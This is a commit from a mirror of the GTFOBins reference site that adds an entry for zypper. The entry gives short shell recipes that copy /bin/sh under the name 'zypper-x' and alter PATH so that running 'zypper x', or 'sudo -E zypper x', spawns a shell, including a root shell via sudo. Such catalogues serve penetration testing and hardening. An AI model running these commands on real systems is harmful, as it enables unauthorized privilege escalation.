1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-11-08 07:49:17 +01:00

Add zypper

Close #52.
This commit is contained in:
the-remmer 2019-02-22 12:51:30 +01:00 committed by Andrea Cardaci
parent dd9f4269ed
commit 8c03983ab8

21
_gtfobins/zypper.md Normal file

@ -0,0 +1,21 @@
---
functions:
shell:
- description: This requires `/bin/sh` to be copied to `/usr/lib/zypper/commands/zypper-x` and this usually requires elevated privileges.
code: |
zypper x
- code: |
TF=$(mktemp -d)
cp /bin/sh $TF/zypper-x
export PATH=$TF:$PATH
zypper x
sudo:
- description: This requires `/bin/sh` to be copied to `/usr/lib/zypper/commands/zypper-x` and this usually requires elevated privileges.
code: |
sudo zypper x
- code: |
TF=$(mktemp -d)
cp /bin/sh $TF/zypper-x
export PATH=$TF:$PATH
sudo -E zypper x
---